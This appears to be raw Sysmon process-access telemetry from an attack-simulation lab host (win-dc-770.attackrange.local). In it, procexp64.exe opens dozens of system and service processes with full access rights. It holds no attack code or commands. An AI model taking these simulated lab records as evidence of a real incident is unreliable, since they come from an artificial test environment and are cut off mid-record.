15:16:05.596{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786747Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.596{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786746Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.596{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786745Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.596{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786744Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.596{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786743Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.596{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786742Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.596{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786741Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.596{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786740Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.596{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786739Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.596{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786738Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.596{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786737Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.596{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786736Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.596{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786735Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.596{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786734Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.596{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786733Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.596{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786732Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786731Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786730Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786729Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786728Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786727Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786726Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786725Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786724Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786723Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786722Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786721Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786720Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786719Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786718Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786717Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786716Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786715Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786714Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786713Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786712Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.580{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786711Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 